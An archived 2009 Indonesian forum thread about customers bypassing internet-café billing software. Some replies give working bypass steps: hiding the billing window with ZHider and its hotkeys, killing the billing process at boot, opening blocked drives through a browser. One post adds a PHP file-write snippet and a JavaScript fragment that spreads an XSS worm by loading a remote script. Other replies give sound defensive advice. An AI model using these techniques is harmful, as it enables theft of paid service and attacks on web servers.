PDA

View Full Version : NANYA CARA NEMBUSIN CYBER BILLING !!!



korvei
07-03-09, 21:35
belakangan warnet saya kok sering ngeliat pemain yg maen game....tanpa masuk ke billing...........

di server billing nya kelihatan nya HIJAU ...tapi di client nya kok ada yg maenin??? aneh....

kok bisa yah? emg ada cara nya yah utk nembusin billing ini tanpa ke detect di server billing nya?

mohon senior IDGS memberi solusi en sharing informasi seputar hal ini....thanks before !!!

:(

LuCkyM3
07-03-09, 21:44
Ini bukan topik terlarang kan?

Gini nih caranya.

1. Pasti di komp itu ada browsernya kan? Firefox atau IExplorer?
2. Buka firefox (FF) atau IE
3. Ketik "C:"
4. Klik thanks di post ini jika berhasil
5. Enjoy


Mod klo ini dilarang bilang ya!

bl00d13z
07-03-09, 22:36
ck..ck..ck.. perasaan udah lama cyberbilling bisa dioprek2..ad 3 cara yg populer..

1. pake tools zhider (mau tak share? pa cari ndri?..cr gmpng koq ^^)..
login biasa trus jalanin zhidernya (tanpa install hebatnya ni tools) trus tar logout..masuk lagi pake tombol ctrl+alt+z (aga2 lupa..klo ga salah ctrl+alt+z) trus skip da tuh login screen cyberbilling..klo udah beres ngenetnya ctrl+alt+x trus login lagi bntr..(ga jg gpp tp jadi ga bayar tar..hehe)



================
= Keystrokes =
================

-----------------------------------------------------------------------------
Primary Key Secondary Key Function
-----------------------------------------------------------------------------
CTRL+ALT+Z WIN+Z Adds currently-active window to the list of
windows to hide/unhide and immediately hides it.
-----------------------------------------------------------------------------
CTRL+ALT+X WIN+X Toggles hide/unhide to all added windows.
-----------------------------------------------------------------------------
CTRL+ALT+C WIN+C Immediately unhides all hidden windows and
clears the list of windows to hide/unhide.
-----------------------------------------------------------------------------
CTRL+ALT+L Displays a list of all added windows. The list
Can be manipulated by menu or by double-clicking
directly within the list. While the list is
open, all hotkeys are disabled until it is
closed. This also displays version information
in the lower-left hand corner of the window.
-----------------------------------------------------------------------------
CTRL+ALT+M Same as CTRL+ALT+C, but also exits ZHider.
-----------------------------------------------------------------------------

(Note: WIN+M is a special Windows keystroke that minimizes all windows and thus
will not exit ZHider. Likewise, WIN+L will lock Windows and will *not* display
the hidden window list.)




2. ctrl+alt+del pas starting windows..(harus cepet sebelum proses aplikasi billing dijalanin system) klo hoki ya tgl end task itu aplikasi billingnya..

3. ada tools klo ga salah nmanya "billing_hack" lupa2 inget.. coba ke www.vb-bego.com klo ga salah dsitu ada..

sbnernya ad lagi cr yg lebih sadis..cm keqnya ga bakal gw expose (private script)..soalnya bisa ambil semua cookie client termasuk file2 admin/OP di server asal syaratnya masih pake windoz XP SP2 n SP3..(sry mksd gw bkn nyombongin..cm sekedar ngasih tau klo utk warnet(tanpa game) windoz itu rentan bgt) ^^




utk solusi wat para admin/OP.. sy saranin sering2 liat log di billing..klo ga salah ada lognya kan kpn dia login kpn dia logout..liat yg login awal n logoutnya sebentar bgt..curigai n tanyain apa emang direstart ato gmn..trus OP jg jgn sering2 ninggalin komp server klo lagi bnyk client..

1 lagi.. ga usa pake sistem pencatatan billing client-server.. server side aja.. (sory bkn maksud ngremehin ato merugikan pihak pembuat software billing) mksdnya server side?! mksdnya pencatatan waktu dilakukan pada saat client masuk ke area dgn membawa identitas (cth id card) dan di komp server cukup menjalankan timernya (tanpa ada aplikasi billing di cliient..semua timer client berada di server)..simpel koq cm paling jgn ampe mati aja itu server..sm modif2 dikit biar client ga install macem2(standar klo yg ini)

Kurt.D.Cobain
08-03-09, 08:32
@TS
dilarang licik diwarnet,ntar digebukin loh ..... hehehehe

Black Zero
08-03-09, 08:37
Itu warnet dia yg dicurangin kali, makanya dia tanya caranya.

Kurt.D.Cobain
08-03-09, 10:25
eh iya ... salah baca....

GoGeTa
08-03-09, 11:56
jawabannya harus nya di pm aja, jgn dibaca umum gini x

bl00d13z
08-03-09, 12:27
ada rule nya ga sih? gw ga tau rule disini gimana..
tp klo gw pribadi sih ok2 aj terbuka meskipun di kalangan tertentu hal keq gni disebut tabu.. malah utk buat kita semua lebih maju ya "terbuka", ga enak kan liatnya klo umum ga tau ternyata selama ini warnet2 gtu billingnya bisa dioprek2..klo ga dikasih tau secara umum admin2nya kapan mau maju warnet2 indonesia..(ini juga gunanya forum..palagi indogamers itu kan ga lepas gitu aja dari IT, mau ga mau keamanan itu harus dibahas) hal tabu yg diekspose itu jadi bahan renungan & pemikiran utk lebih maju.. klo dari gw pribadi ngeliat msh bnyk admin2 yg me-no 2 kan..bahkan mungkin no 10 atau 100 kan sisi keamanan..dan selalu anggap tabu org2 yg mengeksploitasi sistemnya.. seharusnya ada timbal balik yg positif..saling melengkapi untuk membuat sistem lebih baik..:toast:

Kurt.D.Cobain
08-03-09, 14:10
@Atas ...
Lebih baik dishare aja Boss ... klo emang ga bole paling banter diclosed mod ...

bl00d13z
08-03-09, 18:37
@Atas ...
Lebih baik dishare aja Boss ... klo emang ga bole paling banter diclosed mod ...

share apanya ya?! uda di share kan diatas sesuai topic..sharenya disesuain ma kondisi aja..

korvei
09-03-09, 19:12
Ini bukan topik terlarang kan?

Gini nih caranya.

1. Pasti di komp itu ada browsernya kan? Firefox atau IExplorer?
2. Buka firefox (FF) atau IE
3. Ketik "C:"
4. Klik thanks di post ini jika berhasil
5. Enjoy


Mod klo ini dilarang bilang ya!

ga jelas ini ....jelasin plizzz

bl00d13z
10-03-09, 11:10
ga jelas ini ....jelasin plizzz

klo yg dijelasin luckym3 itu cr akses ke drive C: yg di block.. tunelling lwt browser..

LuCkyM3
11-03-09, 08:32
neh screenshot.... bwt cara gw

6351

-sony-
12-03-09, 20:00
yg jadi pertanyaannya, bagaimana cara anda meng-install program di komputer tersebut?

klo seandainya anda bisa meng-install program di komputer itu, maka yang solusinya adalah
mem-blom windows explorer, maksudnya...

kayak sama warnet yg biasa gw main

my komputer terkunci, USB di matiin, tidak bisa download lewat browser(langsung di close sendiri)

mengenai cara yg tadi diatas( ketik C di halaman situs) memang foldernya terbuka, tapi dia hanya menampilkan dalam format READ-ONLY

jadi singkat kata...Komputernya tidak bisa di install apapun, hanya admin yang bisa

sebaiknya yang punya warnet dengan cyber billing memperhatikan hal tersebut

op3l
12-03-09, 23:34
cara mah banyak banyak cara menuju rumah

solusi TEGUR mah hajar tendang dari warnet kl nemu player kek gt... ga ketauan? kompie 1warnet pasti bnyak tuh atau OP net nya agak lolto hehe

bl00d13z
13-03-09, 21:04
yg jadi pertanyaannya, bagaimana cara anda meng-install program di komputer tersebut?


program apaan yg diinstal?? kaga ada program yg diinstall.. zhider tu lgsg execute..

salah satu solusi lain:
gw nyaranin warnet jg terapin blocking eksekusi file berdasarkan path drive
yg berpotensi dtgnya virus atau utk blocking file eksekusi yang tidak dikehendaki (.exe .com .scr .pif) atau file2 script (.vbs .bat ,dll) untuk tidak dijalankan pada path drive tertentu (cdrom/dvdrom,flash disk,hard drive tertentu selain system)

bisa buka control panel->administratif tools->local security police->software restriction polices (klik kanan pada tab ini) kemudian->create new polices (nantinya ada 2 direktori baru terbentuk (lihat gbr)->klik kanan di additional rules dan pilih new path rule... nanti akan tampil jendela baru dan tulis path drive yg ingin anda matikan fungsi executable file & scriptnya..misal E:\ F:\ atau mungkin D;\ isi tab security level dengan "disallowed" utk memblok path drive tersebut.

(jgn sekali-kali mengisi path system windowsny.) dengan begini maka file-file eksekusi/script .exe .com .src .vbs .bat tidak dapat dieksekusi baik virus maupun file setup (untuk bisa mengeksekusinya bisa dipindahkan terlebih dahulu ke path lain yang tida di blok).. cara ini cukup ampuh untuk menjaga system dari virus2 berformat tersebut (autorun.inf pun jika merujuk ke file eksekusi virus pun tidak akan berjalan) terkecuali worm2 html, atau JS.

nah dgn blok semua path kecuali path C:\ setidaknya client ga bisa jalanin tu zhider ato aplikasi2 lain..


http://h1.ripway.com/07121985/tes2.jpg
http://h1.ripway.com/07121985/tes.jpg
http://h1.ripway.com/07121985/tes3.jpg

setidaknya salah satu solusi ini bisa diterapin..client juga tidak jadi merasa dibatasi dalam olah data..copy mencopy dari hdd ke f.disk pun masih bisa client lakukan..

Black Zero
14-03-09, 06:27
Gw sih prefer semua disable buat game center. Klo buat warnet baru boleh ke flash disk. Klo game center bisa usb wahhhhhhhhhhhhhhhhhh pada copy bolak balik cheat program semua.

endhiet
14-03-09, 17:14
loh yg punya warnet kok malah nanya cara nembusin biling??

ini yg punya warnet apa pemain d warnet??

kalo emang situ op/yg punya kan ketauan dari komputer op itu pc online apa kagak

kalo ketauan offline tapi ada yg maen kan gampang solusinya

samperin ke pcnya tarik ke depan warnet telanjangin trus suruh pulang

kalo lom puas gamparin dulu ampe puas biar emaknya tau

LuCkyM3
14-03-09, 20:10
loh yg punya warnet kok malah nanya cara nembusin biling??

ini yg punya warnet apa pemain d warnet??

kalo emang situ op/yg punya kan ketauan dari komputer op itu pc online apa kagak

kalo ketauan offline tapi ada yg maen kan gampang solusinya

samperin ke pcnya tarik ke depan warnet telanjangin trus suruh pulang

kalo lom puas gamparin dulu ampe puas biar emaknya tau

cara pintar... namun gw liat op2 di daerah gw, untuk geser bokong 5 centi aja malas, boro2 samperin

-sony-
14-03-09, 23:44
program apaan yg diinstal?? kaga ada program yg diinstall.. zhider tu lgsg execute..

salah satu solusi lain:
gw nyaranin warnet jg terapin blocking eksekusi file berdasarkan path drive
yg berpotensi dtgnya virus atau utk blocking file eksekusi yang tidak dikehendaki (.exe .com .scr .pif) atau file2 script (.vbs .bat ,dll) untuk tidak dijalankan pada path drive tertentu (cdrom/dvdrom,flash disk,hard drive tertentu selain system)

bisa buka control panel->administratif tools->local security police->software restriction polices (klik kanan pada tab ini) kemudian->create new polices (nantinya ada 2 direktori baru terbentuk (lihat gbr)->klik kanan di additional rules dan pilih new path rule... nanti akan tampil jendela baru dan tulis path drive yg ingin anda matikan fungsi executable file & scriptnya..misal E:\ F:\ atau mungkin D;\ isi tab security level dengan "disallowed" utk memblok path drive tersebut.

(jgn sekali-kali mengisi path system windowsny.) dengan begini maka file-file eksekusi/script .exe .com .src .vbs .bat tidak dapat dieksekusi baik virus maupun file setup (untuk bisa mengeksekusinya bisa dipindahkan terlebih dahulu ke path lain yang tida di blok).. cara ini cukup ampuh untuk menjaga system dari virus2 berformat tersebut (autorun.inf pun jika merujuk ke file eksekusi virus pun tidak akan berjalan) terkecuali worm2 html, atau JS.

nah dgn blok semua path kecuali path C:\ setidaknya client ga bisa jalanin tu zhider ato aplikasi2 lain..


http://h1.ripway.com/07121985/tes2.jpg
http://h1.ripway.com/07121985/tes.jpg
http://h1.ripway.com/07121985/tes3.jpg

setidaknya salah satu solusi ini bisa diterapin..client juga tidak jadi merasa dibatasi dalam olah data..copy mencopy dari hdd ke f.disk pun masih bisa client lakukan..



maksud gw warnet yang gw main itu ga bisa di install apa pun kecuali lewat bypass admin

kamu bilang program itu langsung di exekusi ? pertanyaanya sama kayak gw tadi

bagaimana cara anda mengeksekusi klo explorernya di matiin ???, USB di disable dan msh banyak lagi deh, pokoknya file dari luar ga bisa masuk !!!!

itu aja yang paling penting, klo itu semua di blok, bakalan ga ada bisa masuk FLASH DISK, MAU PUN PROGRAM DARI LUAR

jamin deh

bl00d13z
15-03-09, 01:04
maksud gw warnet yang gw main itu ga bisa di install apa pun kecuali lewat bypass admin

kamu bilang program itu langsung di exekusi ? pertanyaanya sama kayak gw tadi

bagaimana cara anda mengeksekusi klo explorernya di matiin ???, USB di disable dan msh banyak lagi deh, pokoknya file dari luar ga bisa masuk !!!!

itu aja yang paling penting, klo itu semua di blok, bakalan ga ada bisa masuk FLASH DISK, MAU PUN PROGRAM DARI LUAR

jamin deh

ini warnet kan.. ada browser kan pastinya... klo gw upload dulu tu file trus gw download tu file di warnet gmn?.. ga ada browser n ga bisa download juga?! sloww.. gw upload ke FTP server trus gw download via FTP client di windows.. buka cmd bs download via FTP.. cmd di blok?! sloow... kn bisa bkin batch ato vbsnya.. notepad ma wordpad ada kan..

Black Zero
15-03-09, 06:53
Port 80 diblok aja dari router.... dah beres.

bl00d13z
15-03-09, 08:32
Port 80 diblok aja dari router.... dah beres.

FTP port 21 hehe.. mau di blok jg port 21?! sbnernya bs lwt RPC..gunain bnyk port tu salah satuny 111.. sisanya wat rquotad,mountd,statd,portmap,ma lockd portny diatas 1000 ..masih bnyk service2 lain yg bisa digunain wat transfer data..SMB cth, .. sbnernya bloking port 80 kesian.. ribed tar klo da client game yg launchernya gunain tu port..hehe (warnet yg tak nyaman tar julukannya)

permasalahannya kan sy cm jawab gmn cara bypass cyberbilling..sy kasih tau cr populer n saya jg kasih solusi utk itu..buat warnet yg emg udah jalanin solusi2 itu ya ga usah ribetin lagi urus proteksinya..

singkat kata: "keamanan berbanding terbalik dgn kenyamanan" idealkan hal tersebut untuk tujuan anda..

-sony-
15-03-09, 13:25
ini warnet kan.. ada browser kan pastinya... klo gw upload dulu tu file trus gw download tu file di warnet gmn?.. ga ada browser n ga bisa download juga?! sloww.. gw upload ke FTP server trus gw download via FTP client di windows.. buka cmd bs download via FTP.. cmd di blok?! sloow... kn bisa bkin batch ato vbsnya.. notepad ma wordpad ada kan..

CMD, notepad, Download itu semua bekerja di Explorer kan ???

klo explorer d blok gimana???

singkat saja penjelasan mengenai warnet itu
begitu kasih masuk billing, ada icon-icon game, juga ada mozzilla
kamu cuma bisa memilih di antara itu,,,lain dari itu tidak bisa

CMD ama notepad mana ada di cyber billing.. explorernya terkunci sayang

Download ???
begitu anda ingin mendownload file dari firefox, windownya langsung tertutup otomatis (kayak di close gitu)

pokoknya ga bisa di apa-apain, download map dota saja tidak bisa...

Siaunen2
15-03-09, 15:04
@sony
cara ribet kek ini cuman bisa d terapin d gamenet...
kalo d terapin d warnet?
pelanggan kabur krn gk nyaman.......
solusi plg baik ya kembali ke fungsi op warnet tsb

bl00d13z
15-03-09, 15:50
makanya..gw bilang gini singkat kata: "keamanan berbanding terbalik dgn kenyamanan" idealkan hal tersebut untuk tujuan anda.. ini thread kan buat masukan yg punya warnet.. kalopun sony maksa gmn cara eksekusi file tersebut saya bisa aja kasi tau gmn cara reverse engineering file tersebut kemudian inject script tersebut ke situs pribadi kita..istilahnya XSS worm.. dimana bisa kita gabungkan sebuah file eksekusi dengan bantuan JS dan php..hanya masalahnya disini bukan konten nya..

perhatiin snippet gw :

<?php
$p=$HTTP_GET_VARS['param'];
$filename = "./file.txt";

if ($p != "") {
$handle=fopen($filename, "wb");
fputs($handle, $p);
fclose($handle);
}

$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);

print $contents;
?>
ini file indexnya.. distu ada ./file.txt bisa saya costumize..ini standar..skrg tinggal gimana sebuah file exe diintruksi dengan JS
sory saya cuma kasih function request nya spotong (namanya jg snippet) private. bisa explore ndiri gmn maksud dari saya ini

.........function do_request() {
var ip = get_random_ip();
var exploit_string = '<iframe name="iframe2" id="iframe2" ' +
'src="hidden" style="display:none"></iframe> ' +
'<script SRC="http://<webserver>/xssv.js"></script>';

loadIframe('iframe2',
"http://" + ip + "/index.php?param=" + exploit_string);
}..............

chikkiz
05-06-09, 19:55
pake CafeSuite

www.cafesuite.net

oyabin
06-06-09, 17:37
setuju ma atas.... tinggal di disconnect aja tuh yang curang....
ato klo ga, kompie yg ga di pake di kunci dari billing,...

Driver
11-06-09, 21:29
pake CafeSuite

www.cafesuite.net

Setuju biar ga pusink....

Fitur Cafesuite hampir lengkap.

Bagi awal pemakaian emang pusink tapi da lama pasti gerti (sip banget)

gegehare
11-06-09, 21:34
wew, diangkat lagi...

pernah ada thread sejenis :
http://www.indogamers.com/f293/cyber_billing_bisa_dijebol_kah-98894/

buat nambah2 info sklik aja...
yg belum dikasih disini....

Sharon
27-06-09, 19:29
jadi klo gamenet ada browsernya itu bahaya ya?

wah gw mau praktekin ke net gw da!!

nb : waduh klo bang bl00d13z bermain ke gamenet anda harus sediain CCTV itu.


PISS!!